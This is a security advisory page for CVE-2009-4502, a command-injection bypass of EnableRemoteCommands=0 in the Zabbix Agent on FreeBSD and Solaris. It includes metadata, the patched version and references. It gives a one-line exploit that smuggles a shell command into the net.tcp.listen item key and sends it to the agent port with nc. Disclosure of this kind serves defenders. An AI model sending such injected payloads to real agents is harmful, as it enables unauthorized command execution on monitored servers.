Zabbix Agent : Bypass of EnableRemoteCommands=0

2010.01.02

Credit: Nicob

Risk: High

Local: No

Remote: Yes

CVE: CVE-2009-4502

CWE: CWE-264

CVSS Base Score: 9.3/10

Impact Subscore: 10/10

Exploitability Subscore: 8.6/10

Exploit range: Remote

Attack complexity: Medium

Authentication: No required

Confidentiality impact: Complete

Integrity impact: Complete

Availability impact: Complete

>From Wikipedia : "Zabbix is a network management system application
[...] designed to monitor and track the status of various network
services, servers, and other network hardware."
[Zabbix Agent : Bypass of EnableRemoteCommands=0]
Impacted software : Zabbix Agent (FreeBSD and Solaris only)
Zabbix reference : https://support.zabbix.com/browse/ZBX-1032
Patched version : 1.6.7
Faulty source code : function NET_TCP_LISTEN() in
libs/zbxsysinfo/(freebsd|solaris)/net.c
Exploit : $> echo "net.tcp.listen[80';id;echo ']"|nc -vn xxxxx 10050
Limitation : attacker must come from (or spoof) a trusted IP address
Changelog entry : fixed security vulnerability in processing of
net.tcp.listen under FreeBSD and Solaris agents
Nicob

References:

https://support.zabbix.com/browse/ZBX-1032

http://www.vupen.com/english/advisories/2009/3514

http://www.securityfocus.com/archive/1/508439

http://secunia.com/advisories/37740

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Zabbix Agent : Bypass of EnableRemoteCommands=0

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.